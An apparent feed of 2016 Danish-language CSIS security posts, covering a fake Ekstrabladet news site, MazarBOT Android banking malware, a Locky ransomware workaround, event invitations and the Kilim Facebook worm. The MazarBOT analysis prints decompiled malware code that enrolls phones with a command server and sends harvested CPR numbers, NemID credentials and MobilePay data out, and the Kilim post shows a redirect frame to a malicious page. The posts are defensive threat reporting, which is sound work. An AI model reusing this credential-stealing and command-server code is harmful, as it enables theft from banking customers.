https://www.virustotal.com/en/file/73c9bf90cb8573db9139d028fa4872e93a528284c02616457749d40878af8cf8/analysis/

CSIS Blog: Fupside spreder løgne

0
0

En fupside, som er identisk med Ekstrabladet, spreder sig viralt på nettet.

Den lokker med flere kulørte overskrifter, og mest nævneværdig en breaking nyhed om, at digteren Yahya Hassan natten til fredag er tæsket til døde i detentionen i Århus.

Et skærmdump af fup websiden findes herunder:


Motivet for at lave en kopi af Ekstrabladet's hjemmeside, og via den sprede falske historier er ukendt, men vi vil understrege, at websiden ikke indeholder skadelig kode. Det ligner mest af alt en velorkestreret drengestreng, dog med det faktum, at bagmændene har formået at få websiden til at ligne Ekstrabladet, og samtidig beskytte WHOIS data med WhoisGuard.

Websiden befinder sig fysisk på IP adressen 52.17.179.191 og deler plads med 73 andre suspekt domæner. Vi noterer os i den sammenhæng særligt nedenstående domæner, som også lugter langt væk af potentiel konkurrence svindel (saniteret af CSIS):

gratisapple[.]club
appletester[.]club
applevinder[.]club
produkttester[.]space

Vores bedste bud er, at disse svindelsider skal anvendes som trampolin til konkurrence svindel. Vi er ikke i tvivl om, at bagmændene er danske.

Vi har blokeret en sværm af domæner, relateret til disse kampagner, i CSIS Secure DNS og Heimdal PRO/corporate for at beskytte vores kunder mod dette tidsspilde og potentielt tab af data og penge.


CSIS Nyheder: MazarBOT jagter NemID og MobilePay

0
0

Android datatyven, som vi har døbt MazarBOT, er sent i går og her til formiddag blevet SMS'et ud til vilkårlige numre i Danmark.

Den pågældende SMS ankommer med følgende ordlyd (saniteret af CSIS):

"Du har modtaget en MMS-besked fra +4529781229. Følg linket https://bitly[.]com/1TIny9Z".

Se SMS herunder:


Det pågældende link er en legitim URL forkorter tjeneste, som flytter trafikken videre til websiden (saniteret af CSIS) mmsforyou[.]pw/mms.apk. Det pågældende domæne er naturligvis blokeret i CSIS Secure DNS og Heimdal PRO/corporate.  

Den pågældende APK der tilbydes, er en Android applikation, som forsøger at opnå talrige rettigheder på enheden, hvis applikationen køres af en uforsigtig bruger. Se skærmdump herunder:


I næste fase indrulles Android mobilen i et centralt BOTnet. Det sker via følgende API kald (saniteret af CSIS):

org.apache.http.impl.client.DefaultHttpClient.execute ->
(URL: "http://37.1.204[.]175/?action=command",

POST data: "{"os":"4.2.1","model":"Samsung Galaxy Nexus"
"apps":["exts.denmark"]
"imei":"%nr%"
"install id":"1"
"sms":[]
"type":"install"
"operator":"%data%"
"country":"DK"}"
"TelephonyManager.getDeviceId=[ID"). 

Denne funktionalitet er fint og overskueligt defineret i nedenstående:

import android.app.IntentService;
import android.content.Intent;
import android.content.SharedPreferences;
import exts.denmark.utils.RequestFactory;
import exts.denmark.utils.Sender;
import exts.denmark.utils.Utils;
import org.apache.http.impl.client.DefaultHttpClient;
import org.json.JSONObject;

APK pakken er blevet døbt "exts.denmark" af bagmændene og denne gang udvider den sit angreb til decideret at gå efter NemID, Mobilebank og Mobilepay. Vi har dekompileret hele koden og gennemgået samtlige funktioner som afslører at den gøre brug af overlay til at høste sensitive oplysninger som ofret skal lokkes til at indtaste igennem de "forfalskede dialogbokse" som laves over den legitime applikation. Herunder er funktionen gengivet, som høster CPR nummer, NemID brugernavn og password via overlay teknik:

String encodedImage = Utils.getEncodedImage(intent.getStringExtra("nem id"));
JSONObject cardData = new JSONObject();
cardData.put("cpr", intent.getStringExtra("cpr"));
cardData.put("phone", intent.getStringExtra("phone"));
cardData.put("password", intent.getStringExtra("password"));
cardData.put("nem id", encodedImage);
Sender.request(this.httpClient, Constants.ADMIN_LINK,
RequestFactory.makeCardData(appId, cardData).toString());
Utils.putBoolVal(settings, Constants.CARD_SENT, true);
updateCardUIIntent = new Intent(UPDATE_CARDS_UI);
updateCardUIIntent.putExtra("status", true);
sendBroadcast(updateCardUIIntent);

Som det kan ses, så lagres de høstede data via "UPDATE_CARDS_UI" og sendes herefter til de it-kriminelles C&C server. 

Det samme gør sig gælgende for "Mobilepay" høsteren:  

exts.denmark.MainService.3 */
class C00413 implements Runnable {
C00413() {
}

public void run() {
if (MainService.this.getTop().contains("dk.danskebank.mobilepay") && !
MainService.settings.getBoolean(Constants.CARD_SENT, false)) {
Intent i = new Intent(MainService.this, MobileBank.class);
i.addFlags(268435456);
MainService.this.startActivity(i);

SNIP:

} catch (Exception e) {
if (action.equals(REPORT_CARD_DATA)) {
updateCardUIIntent = new Intent(UPDATE_CARDS_UI);
updateCardUIIntent.putExtra("status", false);
sendBroadcast(updateCardUIIntent);

Og igen er hele denne funktionalitet samlet i følgende:

public static final String REPORT_CARD_DATA = "REPORT_CARD_DATA";
public static final String REPORT_INCOMING_MESSAGE = "REPORT_INCOMING_MESSAGE";
public static final String REPORT_INTERCEPT_STATUS = "REPORT_INTERCEPT_STATUS";
public static final String REPORT_LOCK_STATUS = "REPORT_LOCK_STATUS";
public static final String REPORT_SAVED_ID = "REPORT_SAVED_KEY";
public static final String REPORT_SENT_MESSAGE = "REPORT_SENT_MESSAGE";
public static final String UPDATE_CARDS_UI = "UPDATE_CARDS_UI";
private static SharedPreferences settings;
private DefaultHttpClient httpClient;


Denne variant af MazarBOT dropper ikke længere TOR. Men den opnår fortsat rettigheder som gør den i stand til at udføre en stribe af forskellige handlinger på telefonen, herunder opsamle kald og SMS'er, foretage og viderestille opkald, slette telefonen via forskellige metoder, høste telefonumre osv.

Rettighederne, som kræves når applikationen køres, er gengivet herunder:

<uses-permission android:name="android.permission.INTERNET" /> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> <uses-permission android:name="android.permission.READ_PHONE_STATE" /> <uses-permission android:name="android.permission.WAKE_LOCK" /> <uses-permission android:name="android.permission.GET_TASKS" /> <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" /> <uses-permission android:name="android.permission.RECEIVE_SMS" /> <uses-permission android:name="android.permission.SEND_SMS" /> <uses-permission android:name="android.permission.READ_SMS" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />

APK'en er signeret med følgende data:

thumbprint: 5A912A1FFF551139F72C5CF71BCBDF687505F31C
validfrom: 12:20 PM 02/17/2015
serialnumber: 563A8E37
Subject
DN: C=US, O=Android, CN=Android Debug
C: US
CN: Android Debug
O: Android
Issuer
DN: C=US, O=Android, CN=Android Debug

5400 kliks!
Når en gruppe af IT-kriminelle anvender bitly.com som springbræt, overvejer de måske ikke den mulighed at man som almindelig efterforsker kan tilføje et + til URI'en, hvorved der opnås adgang til statistik for hvor mange der har klikket på det pågældende link. Vi antager naturligvis, at der blandt de mange kliks kan gemme sig nysgerrige personer og researchere men hele 5.400 som har klikket på linket er alligevel rigtigt mange, og illustrerer hvor alvorlig en trussel MazarBOT har vokset sig til. Se skærmdump herunder:


C&C server
MazarBOT er som navnet antyder et BOTnet. Når en maskine indrulles kan de it-kriminelle via et grafisk interface kontrollere den enkelte mobiltelefon, eller udstede en klynge-kommando til alle indrullede Android telefoner på samme tid.

C&C serveren er hostet på IP adressen 37.1.204.175

Country:        NL
admin-c:        TNTS-RIPE
tech-c:         TNTS-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-3NT
mnt-routes:     SERVERIUS-MNT
created:        2011-12-13T12:45:15Z
last-modified:  2014-11-22T07:40:47Z
source:         RIPE

Generelt er dette en yderst raffineret datatyv, og vi frygter, og med god grund, at de it-kriminelle vil forfine den ondsindede kode med ny funktionalitet. Også det, at opdatere mobiltelefoner centralt via BOTnettet gør dette til en persistent trussel. 

Antivirus detektion af den analyserede kode, giver os:
https://www.virustotal.com/en/file/4b425799100ea3fb4f10dbcedf0a01e2d8b82fc3c7457066a6cccb84d9065b5b/analysis/

Analyse: Peter Kruse, CSIS eCrime Unit

CSIS Nyheder: Sådan undgår du Locke ransomware

0
0

Vi har tidligere i denne uge været ude med en opgradering af risikoen for Locke (også kendt som Locky) infektion. Locke er en modbydelig ransomware.

Den seneste måned er Locke/Locky, med stor sucess for bagmændene, blevet spredt via pakkede arkiver (zip/rar) i spammails, og med en .js (javascript) i arkivet. Når disse åbnes, af en uforsigtig modtager, aktiveres "wscript.exe", som kører koden, der så igangsætter nedhentning og kørsel af Locke/Locky.

Se et skærmdump af en klassisk Locke spammail herunder:


Men vidste du, at der er et simpelt modsvar på denne type angreb?

En løsning, som vil fungere for langt de fleste slutbrugere, vil være at erstatte eller fjerne associationen til .js filer via f.eks. "HKEY_CLASSES_ROOT.js" og værdien "JSFile" (se skærmdump) hvor vi med Windows værktøjet "regedit" har navigeret til Windows håndtering af .js filer:


Ved kørsel af en ondsindet .js fil, vil dette forhindre koden i at afvikles, idet tilknytningen er fjernet. Se eksempel herunder:


Det vil imidlertid ikke forhindre javascript i at køre via browseren, da Locke/Locky og Dridex spredes via e-mail (og som .js), og dermed åbnes udenfor browseren, hvorved dette er et effektivt workaround uden den store risiko for funktionstab i Microsoft Windows.

En anden tilgang kan være at knytte .js filer til notepad, hvorved disse vil blive åbnet i Notepad og dermed aldrig eksekveret:
HKEY_CLASSES_ROOTVisualStudio.js.10.0shellOpenCommand

Som sagt vil dette workaround fungere for langt de fleste slutbrugere og have effekt på al potentiel malware som forsøges droppet via .js filer.

Hvis man i f.eks. virksomhedsmiljøer har behov for at køre .js filer på desktops, kan man overveje at håndtere dem som f.eks. .jsx og så knytte "JSFile" til denne filendelse, hvilket vil give samme resultat, men stadig forhindre .js fra at blive eksekveret. Og det er jo præcist hvad vi vil opnå her.

Sund fornuft og naturlig skepsis og en lille smule antivirus!
Det bedste råd er nu fortsat sund fornuft og naturlig skepsis, men med de mange infektioner, som vi for øjeblikket ser, kan et workaround af denne type, være en, om ikke andet, midlertidig løsning.

Heimdal PRO/Corporate og CSIS Secure DNS
Som en anden forholdsregel kan vi oplyse, at vi dagligt blokerer for i gennemsnit 50 domæner der anvendes til at hente Locke/Locky ned fra. Det betyder med andre ord, at Heimdal PRO/corporate, eller CSIS Secure DNS også kan bidrage til at beskytte din PC eller din virksomhed mod denne type angreb. Og ikke kun fra Locke/Locky, men fra alle andre kendte trusler der anvender domæner til at hente malware eller binde maskinen ind i et BOTnet. På den måde kan vi ikke alene beskytte mod infektioner, men også mod risikoen for datalækage.

Mere information om Heimdal kan findes på:
https://heimdalsecurity.com

CSIS Nyheder: Invitation til gratis seminar

0
0

CSIS inviterer i samarbejde med SecureDevice til gratis seminar med fokus på IBM QRader SIEM og CSIS Security Analytics Centre Proaktiv Incident Response. 

Seminaret, som vi desværre måtte flytte tidligere grundet sygdom, afholdes i:
Århus d. 17. Maj 2016 kl. 08.00-12.00 hos IBM Client Center, Olof Palmes Alle 44, 8200 Aarhus N.

Program:
08.00 - 08.30   Morgenmad og registrering
08.30 - 08.40   Velkomst v. Michael Albek.
08.40 - 09.20   Trusselsbilledet anno 2016 v. Peter Kruse. Trusler og trends indenfor IT-sikkerhed imod danske virksomheder.
09.20 - 10.00   Log Management, SIEM, SOC eller SAC? v. Michael Albek. Gennemgang af de forskellige løsningsmuligheder.
10.00 - 10.20   Pause og Netværk
10.20 - 11.00   CSIS SAC - 24/7/365 v. Jan Kaastrup. Indblik i Danmarks ledende Security Analytics Centre.
11.00 - 11.20   Paneldiskussion / Q & A's
11.20 - 12.00   Stående frokostbuffet med lette anretninger og netværk

Tilmelding: sacseminar@csis.dk

Vi har et begrænset antal pladser til rådighed, så det er først til mølle.

CSIS Nyheder: Dansk Cybercrime konference med internationale eksperter

0
0

CSIS Security Group A/S kan i samarbejde med ITEK og Finansrådet invitere til den mest eftertragtede it-sikkerhedskonference i Danmark. Konferencen afholdes for 4. år i træk.

Det privatejede danske it-sikkerhedsfirma CSIS Security Group A/S kan i år løfte sløret for en hidtil uset perlerække af internationale talere på dansk jord. Mød bl.a. en spændende keynote fra Eugene Kaspersky og inspirerende indlæg fra firmaer som bl.a. NASA, CERN, ESET, Trendmicro, Barclays, Danske Bank samt mange flere.

"Når vi afholder CCCC16 sker det fordi vi ønsker at sætte fokus på cybercrime", udtaler Peter Kruse, medstifter og it-sikkerhedsekspert i CSIS Security Group, som har bidraget med at udvælge talere til konferencen. "Af samme grund", fortsætter han, "har det været vigtigt for os, at udvælge talere som reelt påvirker trusselsbilledet i den konstante og vedvarende bekæmpelse af international it-kriminalitet".

CCCC16 afholdes i Industriens hus d. 9. juni 2016 og tilbyder flere spor/tracks, som deltagerne kan tilmelde sig ved registrering til konferencen. Blandt de mange spor finder vi "Targeted attacks", Internet of Things (IoT)" og "Critical Infrastucture".

Konferencen afholdes på Engelsk.

Tilmelding og yderligere oplysninger på:
http://cccc-2016.com/

CSIS Blog: Kilim gnaver sig igennem Facebook

0
0

En orm spreder sig i disse dage på Facebook. Den opnår sin effekt ved at sende chat beskeder med indhold fra en inficeret maskine til alle de personer, som du er venner med på Facebook. Derved opnår den en viral effekt. 

Den lokker med indhold som f.eks. "V1DEO-[4 vilkårlige cifre].html. Som det fremgår er der tale om en ordinær HTML fil, men med en indlejret script, som ved et klik, flytter brugeren til en webside hostet i skyen hos Amazon og som ligner en Youtube side (saniteret af CSIS)

<frameset rows="100%">
<frame src="https://s3-eu-west-1.amazonaws[.]com/video47543/red.html">
<noframes>
<body></body>
</noframes>
</frameset>

Den pågældende webside "red.html" består af et lettere obfuseret javascript, som i deobfuskeret form, ser ud som følgende (saniteret af CSIS)


Oversat til dansk betyder det at javacriptet vil bestemme hvilken browser der anvendes. Hvis der anvendes enten Firefox eller Chrome vil du blive tilbudt en browser udvidelse kaldet "45to75". Det er denne del af koden, som skal accepteres af ofret (se nedenstående skærmdump) og hvis det sker, vil den installeres i browseren og starte sin spredning til andre ofre. Den pågældende kode er skrevet i en kombination mellem HTML, JavaScript og CSS. Det er klassisk for browere udvidelser.


Heldigvis kan dette utøj relativt nemt fjernes fra maskinen igen. Det sker ved at åbne browseren i fejlsikret tilstand og manøvrere til extensions/udvidelser og her manuelt slette udvidelsen. Det er ved samme lejlighed en god ide at skifte password til Facebook.

Vi har blokeret domænerne i CSIS Secure DNS og Heimdal PRO/corporate, hvorved vi bremser spredningen af dette uønskede orm.

Som et tillæg udspringer en del af denne uønskede aktivitet fra en server hostet hos OVH i Frankring (saniteret af CSIS) 5.196[.]91.128. Et lille udsnit af domæner, som man med fordel kan blokere hvis man ikke anvender CSIS Secure DNS, omfatter bl.a. (saniteret af CSIS)

labuneamkxxssdwss[.]xyz
kfkejerndjk[.]xyz
dayesaseha[.]xyz
cukdermndnsss[.]info
sigaramindumanisen[.]com
lanadamimeklentisi[.]info

Flere antivirus leverandører kalder denne orm for "JS.Trojan.Kilim" men detektion er desværre lav (3/56):
https://virustotal.com/en/file/772ff3b7ac3a2f1fdb36a9c6b46b9f6235e28f435db8f943146b5c4ad0cf2fa9/analysis/1461223355/

CSIS Nyheder: CSIS deltager på Infosecurity messe

0
0

Vi inviterer dig hermed til at besøge os til en snak om alt indenfor it-sikkerhed når vi næste uge er at finde på Infosecurity messen i Øksnehallen, København.

Vi har indrettet os i bås nr 221, hvor vores særlige fokus på denne messe vil være vores Security Analytics Centre. Kig forbi og hør bl.a. om hvorfor geografisk målrettede angreb ikke kan holdes ude af virksomhedens netværk uden en lokal leverandør med internationale kompentencer.

Messen afholdes i næste uge den 3. og 4. Maj 2016.

Vi glæder os til at se dig!

Der er gratis adgang til messen. Klik på banner herunder for tilmelding.

https://www.databadge.net/isdk2016/reg/?link=04c1dcb139b3ec0b68ce&lan=DA

CSIS Blog: Android datatyv på strandhugst i Danmark

0
0

Vi har tidligere været ude med en advarsel omkring Android datatyven, MazarBOT. En raffineret datatyv som kun kan køres på Android baserede smartphones og som spredes via SMS'er med et link til den skadelige APK (Android applikation).

Desværre har vores advarsler ikke været nok til at bremse denne skadelige kode i at inficere næsten 1000 mobiltelefoner i Danmark. Alene i går (onsdag d. 11.5 2016) blev ikke færre end 138 smartphones i Danmark indsamlet i BOTnettet, hvor de drænes for sensitive informationer herunder kreditkort oplysninger som efterfølgende misbruges.

Herunder en graf som illustrerer hvor målrettet denne MazarBOT kampagne opererer og med særligt fokus på at inficere Android Smartphones i Danmark:


Vi ved også, at denne statistik kun dækker en af flere MazarBOT kampagner. MazarBOT har bl.a. massevis af infektioner i Italien og Grækenland.

CSIS monitorerer tæt MazarBOT aktiviteter og har allerede blokeret for talrige domæner i CSIS Secure DNS og Heimdal PRO, som anvendes enten som distributionspunkt eller C&C.

Vi har allerede frigivet flere tekniske artikler omkring denne trussel. Artiklerne kan findes på linksene herunder:

https://www.csis.dk/da/csis/blog/4818/
https://www.csis.dk/da/csis/news/4844/